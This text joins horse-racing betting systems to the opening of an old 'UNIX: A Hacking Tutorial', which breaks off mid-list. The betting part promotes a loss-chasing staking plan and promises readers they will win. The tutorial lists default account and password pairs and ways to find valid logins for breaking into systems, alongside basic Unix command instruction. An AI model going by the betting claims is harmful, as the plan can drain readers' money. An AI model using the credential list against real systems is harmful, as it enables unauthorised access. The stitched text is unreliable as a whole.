But you are not such a person. You already have a job and you cannot invest the time or energy to compete with these professionals. What are you to do? By being disciplined, intelligent and sticking to a system that works, you can increase your odds of success. 

Bookmakers love the bettor who places bets on whim, on the name of a horse, on the colour eyes of the jockey -- on anything but a system. You need a system if you are to win! The worst possible system you could use is no system at all! 

You must focus on the most dependable horses if you are to correctly pick the day's best bet. Favourites will almost always be the ones you will look at. With good reason. They are favourites for a reason. By simply selecting any favourite at random you will have a 30% - 40% chance of picking a winner. 

The question is, how to improve those chances! 

The most reliable favourites on any given day inevitably are those who occupy the lower end of the price range. You must remember that because of all the variables involved in horse racing, the actual favourite cannot possibly be determined until right before the race. Obviously, you will have to consult with one of the printed betting forecasts such as the national dailies or The Sporting Life. 

Study each race to be run that day and write down the names of the five favourites with the lowest odds. In the event that there is a tie, include all such runners for further consideration. From this short list, you will be determining the day's single horse selection. 

Do not fear low odds. Short odds should not be rejected due to a cursory examination. Even money often translates into an outstanding value if its true price should be 4-7. 

There are those who reject the favourite on the grounds that they can get better "value" elsewhere. We call these people fools. What is the "value" of backing a horse at 5-1 if, in reality, there is only a one in ten chance that your bet will succeed? There is only one person who will profit from a "system" like that -- the bookmaker. 

The real key to successful betting is not being greedy. Do not look for a small stake to garner you thousands of pounds. Rather, use a system which will consistently make you a winner. Financially -- and psychologically -- winning small but often is a smart approach to any kind of wager. 

Okay, so now you have your five favourites. What next? 

Your next gambit is to establish a system to evaluate these five contenders. By following this point system, you will take the guess work out of your evaluation. Forecast Odds Points Given 
1-2 67 
8-15 65 
4-7 63 
8-13 62 
4-6 60 
8-11 58 
4-5 55 
5-6 54 
10-11 52 
Evens 50 
11-10 48 
6-5 45 
5-4 44 
11-8 42 
6-4 40 
13-8 37 
7-4 36 
15-8 35 
2-1 33 
9-4 31 
5-2 28 
11-4 27 
3-1 25 
10-3 23 
7-2 22 
4-1 20 
  

Further, it is possible to evaluate a horse based on its last outing. This makes sense. After all, winning begets winning. For this reason, we can begin to quantify this aspect of our evaluation. 

If a horse placed 1st in its last race, award 45 points. 

If a horse placed 2nd in its last race, award 40 points. 

If a horse placed 3rd in its last race, award 40 points. 

For all other finishes, award 35 points. Also, horses that have yet to race in the current season receive 35 points irrespective of their final finish of the previous season. 

Another consideration in quantifying your decision is the value of your horse's last race. If the winner's prize money of the previous race was worth at least 20% more than the current prize money, award the horse 50 points. All others should follow this criteria: 

Last race prize same as current race, award 40 points. 

Last race prize 20% less than current race, award 30 points. 

You should also bear in mind that favourites win more regularly in non-handicap events. For this reason, it makes more sense to award more points to contenders in these events. Therefore, award 40 points to a contender running in a non-handicap race and 30 points for running in handicap or nursery races. 

Another consideration in evaluating your contender is the size of the field. After careful review of the long history of racing, we have concluded that favourites succeed less often in events containing a large field. Therefore, we reject the "folk wisdom" that a bigger field means a "bigger" certainty and suggest the following awards: 

45 points in those races with 10 or fewer runners. 

40 points in those races with 11 - 16 runners. 

30 points in those races with 16 or more runners. 

Market leaders often have a poorer record in competitive races. Consider the following point award: 

45 points if there are no rivals which won the last time out. 

45 points if there is one rival which won last time out. 

35 points if there are two rivals which won the last time out. 

If three or more rivals won their last time out, award 30 points. 

Finally, if a horse has demonstrated success on the day's course then this must be factored into your calculations. Award your horse 10 points if it has previously won on the course and 10 points if it has previously won over the day's distance. 

Once you have factored in all these considerations, tally the points you have awarded to each of your five contenders. The horse with the greatest total is your best qualifier for the day's bet. It's that simple. No "feelings in the belly". No emotion. No getting caught up in the thrill of the race. Just smart calculation. 

Even so, you should never forget that both horse and rider are living creatures bound to have better and worse days. This is a variable which you cannot often calculate and which makes betting exciting. Remember, it is the uncertainty which makes it wonderful. Never give up. Follow these calculations and you will win -- if not today then certainly 

tomorrow. 
  
THE NETS PROFIT RACING PLAN
This system can be relied upon to produce regular winners at reasonable prices.
Choose one race a day. It doesn't actually matter which race.
There are two different systems depending upon whether the race is a handicap or non handicap. If the race is a non handicap the bet is as follows:-
One point ot win on the unnamed favourite and one point on the named favourite. It will sometimes occur that in reality you are placing both stakes on the same horse, more often than not in non handicap races this will not be the case, however either way stick to the bets as explained here as this will give a good safety margin when betting on the specific race each day.
If the race is a handicap race the bet is slightly different as follows:-
One point to win on the forecast second favourite and one point to win on the forecast third favourite.
As you can see the bet each day be it on a handicap or non handicap race uses two points from your betting bank.
As an extra measure to increase profits you may wish to use two separate betting banks and utilise two different races each day.
Either way it is entirely up to you which race you use and for the more adventurous punters who wish to increase profits this plan is so consistent that any reasonable staking plan can be used.
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------

THE PROFESSIONAL SYSTEM
This method relies on a staking plan and its success depends upon following the instructions exactly!
Your aim will be for target profit, T, of 5 points per race. I use a bank of £200 and give each 'point' a 50p or £1 value. Once you have decided the amount you wish to nominate for each 'point', this should never be altered during a racing sequence.
It is only a matter of time before you have a win even if you know nothing about racing. The reason you have to settle for a relatively low cash value for each point is that this amount multiplies on each loser. Lets imagine you had ten losers in a row, if you had given each point a value of £1 per point then your stake for the 11th bet would be to recover £55. If you had given each point a value of 25p then you would be aiming to recover £10.25. Consider the risks you are taking and compare this with the profit you wish to make!
This system has been used for many years by those who do not believe in gambling. They believe in racing as a business. Now the secrets of the methods are yours!
T =Points target for race
T+L = Target + Loss (if losing)
OR Target - Gain (if winning)
S = Stake
R = Result
W = Points won that race
L = Points lost that race
AWS + Running total of accumulated WINS and LOSSES
Target profit reached, start sequence again
RACE T T+L S R W L AWL 
1 05 05 2 L - 2 -01 
2 10 12 4 L - 4 -06 
3 15 21 7 L - 7 -13 
4 20 33 11 2-1 22 - +09 
5 25 16 5 L - 5 +04 
6 30 26 9 1-1 09 - +13 
7 35 22 7 L - 7 +06 
8 40 34 11 4-1 44 - +50 
9 0 05 2 L - 2 -2 

--------------------------------------------------------------------------------

As you can see, in race 8, the target profit of 40 points was reached and exceeded. At this point all the profit is withdrawn and the sequence started again with 5 points as the target. 

To calculate the race stake, divide by T+L by 3 to the nearest whole number. Then to win at 3-1 or over will clear ALL outstanding losses AND give the expected profit.
Many professionals advise against using odds-on prices or anything below evens, and I would say that if you follow the instructions you should not need to bet on anything less than evens.
You could, if you wish, pay the betting tax on each race by adding it to the target for the next race. In this way the method would pay your tax as well.
You do not need to bet on each race however many Professionals bet on every race at any given meeting every day. For example there may be 6 races at a meeting and six days racing, therefore a total of 36 bets in a week.
My advice is select your races carefully or better still subscribe to an advice service. Beware of newspaper tips and naps. One 'expert' gave over thirty losers on the trot. Although this is rare, it can happen, and if the target is too high, this run can be uncomfortable.
Alternate your bets with three or four bookmakers as no bookmaker will absorb winning bets over a lengthy period.
Whatever stake you use remember that a single win of 3-1 or over will clear ALL outstanding losses AND give the EXPECTED PROFIT!
--------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                        UNIX : A Hacking Tutorial                          +
+                            By: Sir Hackalot                               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

----------------------
o Intent of this file:
----------------------

     This phile is geared as an UNIX tutorial at first, to let you get more
familiar with the operating system.  UNIX is just an operating system, as
is MS-DOS, AppleDOS, AmigaDOS, and others.  UNIX happens to be a multi-user-
multi-tasking system, thus bringing a need for security not found on MSDOS,
AppleDOS, etc.  This phile will hopefully teach the beginners who do not have
a clue about how to use UNIX a good start, and may hopefully teach old pros
something they didn't know before.  This file deals with UNIX SYSTEM V and
its variants.  When I talk about unix, its usually about SYSTEM V (rel 3.2).

Where Can I be found?  I have no Idea.  The Boards today are going Up'n'Down
so fast, 3 days after you read this file, if I put a BBS in it where you could
reach me, it may be down!  Just look for me.

I can be reached on DarkWood Castle [If it goes back up], but that board
is hard to get access on, but I decided to mention it anyway.

I *COULD* Have been reached on jolnet, but......

This file may have some bad spelling, etc, or discrepencies since it was
spread out over a long time of writing, because of school, work, Girl friend,
etc.  Please, no flames.  If you don't like this file, don't keep it.

This is distributed under PHAZE Inc.  Here are the members (and ex ones)
The Dark Pawn
The Data Wizard
Sir Hackalot (Me)
Taxi (ummm.. Busted)
Lancia (Busted)
The British Knight (Busted)
The Living Pharoah (Busted)

_____________________________________________________________________________


-------------
o Dedication:
-------------
        This phile is dedicated to the members of LOD that were raided in
Atlanta.  The members that got busted were very good hackers, especially
The Prophet. Good luck to you guys, and I hope you show up again somewhere.
_____________________________________________________________________________

------------------------
o A little History, etc:
------------------------

        UNIX, of course, was invented By AT&T in the 60's somewhere, to be
"a programmer's operating system."  While that goal was probably not reached
when they first invented UNIX, it seems that now, UNIX is a programmer's OS.
UNIX, as I have said before, is a multi-tasking/multi-user OS.  It is also
written in C, or at least large parts of it are, thus making it a portable
operating system.  We know that MSDOS corresponds to IBM/clone machines,
right?  Well, this is not the case with UNIX.  We do not associate it with
any one computer since it has been adapted for many, and there are many
UNIX variants [that is, UNIX modified by a vendor, or such].  Some AT&T
computers run it, and also some run MSDOS [AT&T 6300].  The SUN workstations
run SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX version
of UNIX.  Remember, no matter what the name of the operating system is [BSD,
UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as the
commands the operating system uses.  Some variants may have features others
do not, but they are basically similar in that they have a lot of the same
commands/datafiles.  When someone tries to tell you that UNIX goes along with
a certain type of computer, they may be right, but remember, some computers
have more than one Operating system.  For instance, one person may tell you
that UNIX is to a VAX as MSDOS is to IBM/clones.  That is untrue, and the
only reason I stated that, was because I have seen many messages with info
/comparisons in it like that, which confuse users when they see a VAX running
VMS.
____________________________________________________________________________


-------------------------------
o Identifying a Unix/Logging in
-------------------------------

        From now on, I will be referring to all the UNIX variants/etc as
UNIX, so when I say something about UNIX, it generally means all the variants
(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless
I state a variant in particular.

        Okay.  Now its time for me to tell you how a unix USUALLY greets you.
First, when you call up a UNIX, or connect to one however you do, you will
usually get this prompt:

login:

Ok.  Thats all fine and dandy.  That means that this is PROBABLY a Unix,
although there are BBS's that can mimic the login procedure of an OS
(Operating System), thus making some people believe its a Unix. [Hah!].
Some Unixes will tell you what they are or give you a message before a
login:  prompt, as such:

Welcome to SHUnix.  Please log in.

login:

        Or something like that.  Public access Unixes [like Public BBSs] will
tell you how to logon if you are a new users.  Unfortunatly, this phile is
not about public access Unixes, but I will talk about them briefly later, as
a UUCP/UseNet/Bitnet address for mail.
        OK.  You've gotten to the login prompt!  Now, what you need to do
here is enter in a valid account.  An Account usually consists of 8 characters
or less.  After you enter in an account, you will probably get a password
prompt of some sort.  The prompts may vary, as the source code to the login
program is usually supplied with UNIX, or is readily available for free.
Well, The easiest thing I can say to do to login is basically this:
Get an account, or try the defaults.  The defaults are ones that came with
the operating system, in standard form.  The list of some of the Defaults
are as follows:

ACCOUNT                         PASSWORD
-------                         --------
root                            root      - Rarely open to hackers
sys                             sys / system / bin
bin                             sys / bin
mountfsys                       mountfsys
adm                             adm
uucp                            uucp
nuucp                           anon
anon                            anon
user                            user
games                           games
install                         install
reboot                            * See Below
demo                            demo
umountfsys                      umountfsys
sync                            sync
admin                           admin
guest                           guest
daemon                          daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are
root level accounts, meaning they have sysop power, or total power.  Other
logins are just "user level" logins meaning they only have power over what
files/processes they own.  I'll get into that later, in the file permissions
section.  The REBOOT login is what as known as a command login, which just
simply doesn't let you into the operating system, but executes a program
assigned to it.  It usually does just what it says, reboot the system.  It
may not be standard on all UNIX systems, but I have seen it on  UNISYS unixes
and also HP/UX systems [Hewlett Packard Unixes].  So far, these accounts have
not been passworded [reboot], which is real stupid, if you ask me.

COMMAND LOGINS:
---------------

There are "command logins", which, like reboot, execute a command then log
you off instead of letting you use the command interpreter. BSD is notorious
for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same

These are the most useful, since they will give the account names that are
online, thus showing you several accounts that actually exist.


Errors:
-------

When you get an invalid Account name / invalid password, or both, you will
get some kind of error.  Usually it is the "login incorrect" message.  When
the computer tells you that, you have done something wrong by either enterring
an invalid account name, or a valid account name, but invalid password.  It
does not tell you which mistake you made, for obvious reasons.  Also,
when you login incorrectly, the error log on the system gets updated, letting
the sysops(s) know something is amiss.

        Another error is "Cannot change to home directory" or "Cannot Change
Directory."  This means that no "home directory" which is essentially the
'root' directory for an account, which is the directory you start off in.
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in
/homedirectory.  [Note: The / is used in directories on UNIX, not a \ ].
Most systems will log you off after this, but some tell you that they will
put you in the root directory [ '/'].

        Another error is "No Shell".  This means that no "shell" was defined
for that particular account.  The "shell" will be explained later.  Some
systems will log you off after this message.  Others will tell you that they
will use the regular shell, by saying "Using the bourne shell", or "Using sh"

-----------------------------
Accounts In General        :
-----------------------------

        This section is to hopefully describe to you the user structure
in the UNIX environment.
        Ok, think of UNIX having two levels of security: absolute power,
or just a regular user.  The ones that have absolute power are those users
at the root level.  Ok, now is the time to think in numbers.  Unix associates
numbers with account names.  each account will have a number.  Some will have
the same number.  That number is the UID [user-id] of the account.  the root
user id is 0.  Any account that has a user id of 0 will have root access.
Unix does not deal with account names (logins) but rather the number
associated with them.  for instance, If my user-id is 50, and someone else's
is 50, with both have absolute power of each other, but no-one else.
_____________________________________________________________________________

---------------
Shells        :
---------------

        A shell is an executable program which loads and runs when a user
logs on, and is in the foreground.  This "shell" can be any executable prog-
ram, and it is defined in the "passwd" file which is the userfile.  Each
login can have a unique "shell".  Ok.  Now the shell that we usually will work
with is a command interpreter.  A command interpreter is simply something
like MSDOS's COMMAND.COM, which processes commands, and sends them to the
kernel [operating system].  A shell can be anything, as I said before,
but the one you want to have is a command interpreter.  Here are the
usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM".  It has
     a "script" language, as do most of the command interpreters on Unix sys-
     tems.

csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell.  Just another command interpreter.
tcsh - this is one, which is used at MIT I believe.  Allows command editing.
vsh - visual shell.  It is a menu driven deal.  Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell.  Both Explained later.
        There are many others, including "homemade " shells, which are
programs written by the owner of a unix, or for a specific unix, and they
are not standard.  Remember, the shell is just the program you get to use
and when it is done executing, you get logged off.  A good example of a
homemade shell is on Eskimo North, a public access Unix.  The shell
is called "Esh", and it is just something like a one-key-press BBS,
but hey, its still a shell.  The Number to eskimo north is 206-387-3637.
[206-For-Ever]. If you call there, send Glitch Lots of mail.
        Several companies use Word Processors, databases, and other things
as a user shell, to prevent abuse, and make life easier for unskilled computer
operators.  Several Medical Hospitals use this kind of shell in Georgia,
and fortunatly, these second rate programs leave major holes in Unix.
Also, a BBS can be run as a shell.  Check out Jolnet [312]-301-2100, they
give you a choice between a command interpreter, or a BBS as a shell.
WHen you have a command interpreter, the prompt is usually a:
 $
when you are a root user the prompt is usually a:
 #
The variable, PS1, can be set to hold a prompt.
For instance, if PS1 is "HI:", your prompt will be:
 HI:

_____________________________________________________________________________

------------------------
SPecial Characters, ETc:
------------------------

Control-D : End of file.  When using mail or a text editor, this will end
the message or text file.  If you are in the shell and hit control-d you get
logged off.

Control-J: On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard.  This can represent a letter. If you specified
   something at the command line like "b?b" Unix would look for bob,bib,bub,
   and every other letter/number between a-z, 0-9.
* : this can represent any number of characters.  If you specified a "hi*"
    it would use "hit", him, hiiii, hiya, and ANYTHING that starts with
    hi.  "H*l" could by hill, hull, hl, and anything that starts with an
    H and ends with an L.

[] - The specifies a range.  if i did b[o,u,i]b unix would think: bib,bub,bob
     if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb.  Get the idea? The
     [], ?, and * are usually used with copy, deleting files, and directory
     listings.

EVERYTHING in Unix is CASE sensitive.  This means "Hill" and "hill" are not
the same thing.  This allows for many files to be able to be stored, since
"Hill" "hill" "hIll" "hiLl", etc. can be different files.  So, when using
the [] stuff, you have to specify capital letters if any files you are dealing
with has capital letters.  Most everything is lower case though.

----------------
Commands to use:
----------------

Now, I will rundown some of the useful commands of Unix.  I will act
as if I were typing in the actual command from a prompt.

ls - this is to get a directory.  With no arguments, it will just print out
     file names in either one column or multi-column output, depending on the
     ls program you have access to.

        example:
        $ ls
        hithere
        runme
        note.text
        src
        $
        the -l switch will give you extended info on the files.
        $ ls -l
        rwx--x--x sirhack     sirh    10990 runme
        and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack    sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.
The format varies, but you should have the general idea.

cat - this types out a file onto the screen.  should be used on text files.
      only use it with binary files to make a user mad [explained later]
      ex:
      $ cat note.txt
      This is a sample text file!
      $

cd - change directory .  You do it like this: cd /dir/dir1/dir2/dirn.
     the dir1/etc.... describes the directory name.  Say I want to get
     to the root directory.
     ex:
     $ cd /
     *ok, I'm there.*
     $ ls
     bin
     sys
     etc
     temp
     work
     usr
 all of the above are directories, lets say.
     $ cd /usr
     $ ls
     sirhack
     datawiz
     prophet
     src
     violence
     par
     phiber
     scythian
     $ cd /usr/sirhack
     $ ls
     hithere
     runme
     note.text
     src
     $
ok, now, you do not have to enter the full dir name.  if you are in
a directory, and want to get into one that is right there [say "src"], you
can type "cd src" [no "/"].  Instead of typing "cd /usr/sirhack/src" from the
sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
     $ cp runme runme2
     $ ls
     hithere
     runme
     note.text
     src
     runme2
Full pathnames can be included, as to copy it to another directory.
     $ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
     $ mv runme2 runit
     $ ls
     hithere
     runme
     note.text
     src
     runit
    files can be renamed into other directories.
     $ mv runit /usr/datwiz/run
     $ ls
     hithere
     runme
     note.text
     src
     $ ls /usr/datwiz
     runme
     run

pwd - gives current directory
     $ pwd
     /usr/sirhack
     $ cd src
     $ pwd
     /usr/sirhack/src
     $ cd ..
     $ pwd
     /usr/sirhack
     [ the ".." means use the name one directory back. ]
     $ cd ../datwiz
       [translates to cd /usr/datwiz]
     $ pwd
     /usr/datwiz
     $ cd $home
     [goto home dir]
     $ pwd
     /usr/sirhack

rm - delete a file.  syntax "rm filename" or "rm -r directory name"
     $ rm note.text
     $ ls
     hithere
     runme
     src
     $

write - chat with another user.  Well, "write" to another user.
syntax: "write username"
    $ write scythian
    scythian has been notified
    Hey Scy! What up??
    Message from scythian on tty001 at 17:32
    hey!
    me: So, hows life?
    scy: ok, I guess.
    me: gotta go finish this text file.
    scy: ok
    me: control-D [to exit program]
    $

who [w,who,whodo] - print who is online
    $ who
    login       term   logontime
    scythian +  tty001 17:20
    phiberO  +  tty002 15:50
    sirhack  +  tty003 17:21
    datawiz  -  tty004 11:20
    glitch   -  tty666 66:60
    $
    the "who" commands may vary in the information given.  a "+" means
    you can "write" to their terminal, a "-" means you cannot.

man - show a manual page entry.  syntax "man command name"  This is a help
      program.  If you wanted to know how to use... "who" you'd type
    $ man who
    WHO(1)   xxx......
      and it would tell you.

stty - set your terminal characteristics.  You WILL have to do "man stty"
     since each stty is different, it seems like.
     an example would be:
    $ stty -parenb
      to make the data params N,8,1.  A lot of Unixes operate at
      e,7,1 by default.

sz,rz - send and recieve via zmodem
rx,sx - send / recieve via xmodem
rb,sb - send via batch ymodem.   These 6 programs may or may not be on a unix.
umodem - send/recieve via umodem.
      $ sz filename
      ready to send...
      $ rz filename
      please send your file....
      ...etc..

ed - text editor.  Usage "ed filename"  to create a file that doesn't
     exist, just enter in "ed filename"
     some versions of ed will give you a prompt, such as "*" others will not
     $ ed newtext
     0
     * a
     This is line 1
     This is line 2
     [control-z]
     * 1 [to see line one]
     This is line 1
     * a [keep adding]
     This is line 3
     [control-z]
     *0a [add after line 0]
     This is THE first line
     [control-z]
     1,4l
     This is THE first line
     This is line 1
     This is line 2
     This is line 3
     * w
     71
     * q
     $
   The 71 is number of bytes written.
   a = append
   l = list
   # = print line number
   w - write
   l fname = load fname
   s fname = save to fname
   w = write to current file
   q = quit
mesg - turn write permissions on or off to your terminal (allow chat)
     format "mesg y" or "mesg n"
cc - the C compiler.  don't worry about this one right now.
chmod - change mode of a file.  Change the access in other words.
        syntax: "chmod mode filename"
        $ chmod a+r newtext
      Now everyone can read newtext.
      a = all
      r = read.  This will be explained further in the File System section.

chown - change the owner of a file.
       syntax: "chown owner filename"
       $ chown scythian newtext
       $
chgrp - change the group [explained later] of a file.
       syntax: "chgrp group file"
       $ chgrp root runme
       $
finger - print out basic info on an account.  Format: finger username
grep - search for patterns in a file.  syntax: "grep pattern file"
       $ grep 1 newtext
       This is Line 1
       $ grep THE newtext
       This is THE first line
       $ grep "THE line 1" newtext
       $

mail - This is a very useful utility.  Obviously, you already know what it
        is by its name.  There are several MAIL utilities, such as ELM, MUSH
        and MSH, but the basic "mail" program is called "mail".  The usage
        is:
        "mail username@address" or
        "mail username"
        or
        "mail"
        or "mail addr1!addr2!addr3!user"

        "mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail.  When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps.  The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually.  I could look
like this: mail phiber@optik
           then look like this to the computer:

           mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principal of the thing.
Now, if there is no smart mailer online, you'll have to know the FULL path
name of the person you wish to mail to. For Instance, I want to mail to
.. phiber.  I'd do this if there were no smart mailer:

  $ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

    Hey Guy.  Whats up?  Well, gotta go.  Nice long message huh?
    [control-D]
  $
Then, when he got it, there would be about 20 lines of information, with
like a post mark from every system my message went thru, and the "from" line
would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack <Sir Hack>

        Now, for local mailing, just type in "mail username" where username
is the login you want to send mail to.  Then type in your message.  Then
end it with a control-D.

        To read YOUR mail, just type in mail.  IE:

        $ mail

        From scythian ............
        To sirhack ............
        Subject: Well....

        Arghhh!

        ?
 The dots represent omitted crap.  Each Mail program makes its own headings.
 That ? is a prompt.  At this prompt I can type:

        d - delete
        f username - forward to username
        w fname - write message to a file named fname
        s fname - save message with header into file
        q - quit / update mail
        x - quit, but don't change a thing
        m username - mail to username
        r - reply
        [enter] - read next message
        + - go forward one message
        - : go back one
        h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.

--------

If you send mail to someone not on your system, you will have to wait longer
for a reply, since it is just as a letter.  A "postman" has to pick it up.
The system might call out, and use UUCP to transfer mail.  Usually, uucp
accounts are no good to one, unless you have uucp available to intercept mail.

ps - process.  This command allows you to see what you are actually doing
in memory.  Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root.  usually, the first thing in a process
list given by "ps" is your shell name.  Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian".  The watch program would
go into the background, meaning I'd still be able to do things while it was
running:
  $ ps
  PID  TTY  NAME
  122  001  ksh
  123  001  watch
  $
  That is a shortened PS.  That is the default listing [a brief one].
  The TTY column represents the "tty" [i/o device] that the process is being
  run from.  This is only useful really if you are using layers (don't worry)
  or more than one person is logged in with the same account name.  Now,
  "ps -f" would give a full process listing on yourself, so instead of
  seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process.  This is used to terminate a program in memory obvio-
ously.  You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later).  If you kill the shell process, you are logged
off.  By the same token, if you kill someone else's shell process, they
are logged off.  So, if I said "kill 122" I would be logged off.  However,
kill only sends a signal to UNIX telling it to kill off a process.  If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never.  So, you can specify urgency! Try "kill -num pid"
Kill -9 pid  is a definite kill almost instantly.  So if I did this:
 $ kill 122
 $ kill 123
 $ ps
 PID   TTY   NAME
 122   001   ksh
 123   001   watch
 $ kill -9 123
 [123]: killed
 $ kill -9 122
 garbage
 NO CARRIER

Also, you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (explained later).

-------------------
Shell Programmin'
-------------------

        Shell Programming is basically making a "script" file for the
standard shell, being sh, ksh, csh, or something on those lines.  Its
like an MSDOS batch file, but more complex, and more Flexible.
This can be useful in one aspect of hacking.


First, lets get into variables.  Variables obviously can be assigned
values.  These values can be string values, or numberic values.

number=1

        That would assign 1 to the variable named "number".

string=Hi There
or
string="Hi There"

        Both would assign "Hi there" to a variable.

        Using a variable is different though.  When you wish to use a variable
        you must procede it with a dollar ($) sign.  These variables can
        be used as arguments in programs.  When I said that scripts are
        like batch files, I meant it.  You can enter in any name of a program
        in a script file, and it will execute it. Here is a sample script.

counter=1
arg1="-uf"
arg2="scythian"

ps $arg1 $arg2

echo $counter

        That script would translate to "ps -uf scythian" then would print
        "1" after that was finished.  ECHO prints something on the screen
        whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads someting into a variable.  format : read variable .  No dollar
        sign is needed here!  If I wwanted to get someone's name, I could
        put:

echo "What is your name?"
read hisname
echo Hello $hisname

        What is your name?
        Sir Hackalot
        Hello Sir Hackalot

        Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
       format: trap "command ; command ; command ; etc.."
Example:
        trap "echo 'Noway!! You are not getting rid o me that easy' ; echo
        'You gotta see this through!'"

        Now, if I hit control-c during the script after this statement was
        executed, I'd get:
        Noway!! You are not getting rid of me that easy
        You gotta see this through!

exit : format :exit [num]  This exists the shell [quits] with return
        code of num.

-----
CASE
-----

        Case execution is like a menu choice deal.  The format of the command
        or structure is :
        case variable in
        1) command;
           command;;
        2) command;
           command;
           command;;
        *) command;;
         esac
        Each part can have any number of commands. The last command however
        must have a ";;".  Take this menu:

        echo "Please Choose:"
        echo "(D)irectory (L)ogoff (S)hell"
        read choice
        case $choice in

        D) echo "Doing Directory...";
           ls -al ;;
        L) echo Bye;
           kill -1 0;;
        S) exit;;
        *) Echo "Error! Not a command";;
        esac

        The esac marks the end of a case function.  It must be after the
        LAST command.

Loops
-----

        Ok, loops.  There are two loop functins.  the for loops, and the
        repeat.

        repeat looks like this: repeat something somethin1 somethin2
        this would repeat a section of your script for each "something".
        say i did this:
        repeat scythian sirhack prophet

        I may see "scythian" then sirhack then prophet on my screen.

        The for loop is defined as "for variable in something
                                    do
                                    ..
                                    ..
                                    done"

        an example:
        for counter in 1 2 3
        do
        echo $counter
        done

        That would print out 1 then 2 then 3.

Using TEST
----------
The format:  Test variable option variable

The optios are:
-eq    =
-ne    <> (not equal)
-gt    >
-lt    <
-ge    >=
-le    <=

for strings its: = for equal  != for not equal.

If the condition is true, a zero is returned.  Watch:

        test 3 -eq 3

that would be test 3 = 3, and 0 would be returned.

EXPR
----

This is for numeric functions.  You cannot simply type in
echo 4 + 5
and get an answer most of the time.  you must say:
expr variable [or number] operator variable2 [or number]
the operators are:

+ add
- subtract
* multiply
/ divide
^ - power (on some systems)

example :   expr 4 + 5
var = expr 4 + 5
var would hold 9.

        On some systems, expr sometimes prints out a formula.  I mean,
        22+12 is not the same as 22 + 12.  If you said expr 22+12 you
        would see:
        22+12
        If you did expr 22 + 12 you'd see:
        34


SYSTEM VARIABLES
----------------

        These are variables used by the shell, and are usually set in the
system wide .profile [explained later].

HOME - location of your home directory.
PS1  - The prompt you are given.  usually $ .  On BSD its usually &
PATH - This is the search path for programs.  When you type in a program
to be run, it is not in memory; it must be loaded off disk.  Most commands
are not in Memory like MSDOS.  If a program is on the search path, it may
be executed no matter where you are.  If not, you must be in the directory
where the program is.  A path is a set of directories basically, seperated by
":"'s.  Here is a typical search path:

        :/bin:/etc:/usr/lbin:$HOME:

When you tried to execute a program, Unix would look for it in /bin,
/etc, /usr/lbin, and your home directory, and if its not found, an error is
spewed out.  It searches directories in ORDER of the path.  SO if you had a
program named "sh" in your home directory, and typed in "sh", EVEN if
you were in your home dir, it would execute the one in /bin. So, you
must set your paths wisely.  Public access Unixes do this for you, but systems
you may encounter may have no path set.

TERM - This is your terminal type.  UNIX has a library of functions called
"CURSES" which can take advantage of any terminal, provided the escape
codes are found.  You must have your term set to something if you run
screen oriented programs.  The escape codes/names of terms are found
in a file called TERMCAP.  Don't worry about that.  just set your term
to ansi or vt100.  CURSES will let you know if it cannot manipulate your
terminal emulation.


-------------------
The C compiler
-------------------

        This Will be BRIEF.  Why?  Becuase if you want to learn C, go
        buy a book.  I don't have time to write another text file on
        C, for it would be huge.  Basically, most executables are programmed
        in C.  Source code files on unix are found as filename.c  .
        To compile one, type in "cc filename.c".  Not all C programs
        will compile, since they may depend on other files not there, or
        are just modules.  If you see a think called "makefile" you can
        usually type in just "make" at the command prompt, and something
        will be compiled, or be attempted to compile.  When using make or
        CC, it would be wise to use the background operand since
        compiling sometimes takes for ever.
        IE:
        $ cc login.c&
        [1234]
        $
        (The 1234 was the process # it got identified as).


_____________________________________________________________________________

---------------
The FILE SYSTEM
---------------

        This is an instrumental part of UNIX.  If you do not understand this
section, you'll never get the hang of hacking Unix, since a lot of Pranks
you can play, and things you can do to "raise your access" depend on it.

First, Let's start out by talking about the directory structure.  It is
basically a Hiearchy file system, meaning, it starts out at a root directory
and expands, just as MSDOS, and possibly AmigaDos.

Here is a Directory Tree of sorts:  (d) means directory

                        /  (root dir)
                        |
                        |--------------------|
                      bin (d)               usr (d)
                                        ----^--------------------
                                        |        |              |
                                    sirhack(d)  scythian (d)    prophet (d)
                                        |
                                        src (d)

Now, this particular system contains the following directories:
/
/bin
